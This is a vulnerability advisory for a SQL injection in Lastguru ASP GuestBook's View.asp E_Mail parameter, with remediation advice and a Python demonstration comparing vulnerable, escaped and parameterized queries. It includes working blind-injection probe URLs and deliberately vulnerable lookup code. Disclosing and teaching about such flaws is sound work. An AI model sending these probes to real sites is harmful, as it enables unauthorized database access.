Lastguru ASP Guestbook suffers from a remote SQL injection vulnerability.
Title: Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability
Product : Lastguru ASP GuestBook
Version : Free Version
Vendor: http://www.LastGuru.com
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: 2012-03-04
Updated:
Impact : High (CVSSv2 Base : 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P)
Bug Description :
Page 'View.asp' of Lastguru ASP GuestBook (Free Version) is vulnerable to SQL injection through the 'E_Mail' query-string parameter, which is concatenated into a database query without validation or escaping.
POC (the first two requests form a true/false pair; a vulnerable page answers them differently, and the third confirms that arbitrary subqueries against the [book] table are evaluated):
#-------------------------------------------------------------
http://victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a
http://victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='b
http://victim/View.asp?E_Mail=webmaster@lastguru.com' and 0<(select count(*) from [book]) and 'a'='a
etc...
#-------------------------------------------------------------
Advice:
Pass user input to the database as bound parameters (ADODB.Command with CreateParameter) instead of concatenating it into the query string. Escaping the single quote with 'replace()' only protects quoted string literals and should be treated as a secondary measure, not the fix.
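The following Python script is an added illustration, not code from the advisory or from the Lastguru product. It rebuilds the three PoC probes against a constructed in-memory SQLite copy of the [book] table (the table name comes from the third PoC URL; the column names, the sample rows and the numeric ID lookup are assumptions) and runs them through three versions of the lookup: the vulnerable concatenation, the replace()-based escaping suggested above, and a parameterized query. It shows why the true/false pair works as an oracle, that escaping the quote happens to stop these string-context payloads, and that escaping alone fails as soon as the same pattern is used for an unquoted numeric value.

```python
import sqlite3

# Constructed sample data standing in for the guestbook's [book] table.
# Column names and rows are assumptions for this illustration.
SAMPLE_ROWS = [
    (1, "webmaster@lastguru.com", "Admin", "Welcome to the guestbook"),
    (2, "alice@example.com", "Alice", "Nice site"),
]


def make_db():
    """Create an in-memory SQLite database with a [book] table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE book (ID INTEGER, E_Mail TEXT, Name TEXT, Message TEXT)")
    conn.executemany("INSERT INTO book VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def view_vulnerable(conn, email):
    """Mirrors the bug: the E_Mail value is concatenated straight into the
    WHERE clause, so a single quote in the input ends the string literal."""
    sql = "SELECT Name, Message FROM book WHERE E_Mail = '" + email + "'"
    return conn.execute(sql).fetchall()


def view_escaped(conn, email):
    """The replace()-style mitigation: double every single quote before
    concatenating. This only protects a value that sits inside quotes."""
    sql = "SELECT Name, Message FROM book WHERE E_Mail = '" + email.replace("'", "''") + "'"
    return conn.execute(sql).fetchall()


def view_parameterized(conn, email):
    """Recommended fix: bind the value as a query parameter so the database
    never parses it as SQL. In classic ASP the equivalent is an ADODB.Command
    with CreateParameter instead of string concatenation."""
    return conn.execute(
        "SELECT Name, Message FROM book WHERE E_Mail = ?", (email,)
    ).fetchall()


def view_escaped_by_id(conn, id_value):
    """Assumed numeric lookup using the same escaping idea. There are no
    quotes around the value, so replacing quotes does nothing useful."""
    sql = "SELECT Name, Message FROM book WHERE ID = " + id_value.replace("'", "''")
    return conn.execute(sql).fetchall()


# The three probes from the PoC section, exactly as sent in E_Mail.
PROBE_TRUE = "webmaster@lastguru.com' and 'a'='a"
PROBE_FALSE = "webmaster@lastguru.com' and 'a'='b"
PROBE_COUNT = "webmaster@lastguru.com' and 0<(select count(*) from [book]) and 'a'='a"


def blind_oracle(view, conn, probes):
    """True for each probe that still returns the entry, False otherwise.
    A vulnerable page answers the true/false pair differently; a fixed page
    treats every probe as a literal address that matches nothing."""
    return [len(view(conn, p)) > 0 for p in probes]


def demo():
    """Run all three probes through each variant of the lookup."""
    conn = make_db()
    probes = [PROBE_TRUE, PROBE_FALSE, PROBE_COUNT]
    return {
        "vulnerable": blind_oracle(view_vulnerable, conn, probes),
        "escaped": blind_oracle(view_escaped, conn, probes),
        "parameterized": blind_oracle(view_parameterized, conn, probes),
        # Numeric context: quote escaping cannot stop "1 or 1=1".
        "escaped_numeric_rows": len(view_escaped_by_id(conn, "1 or 1=1")),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable variant answers the pair as [True, False] and also evaluates the count subquery, which is the oracle a blind attacker uses to extract data one condition at a time. Both the escaped and the parameterized variants answer every probe with no rows, but only the parameterized one keeps that property for the numeric lookup, where "1 or 1=1" returns every row despite the escaping.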
Credits : This vulnerability was discovered by demonalex@163.com
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK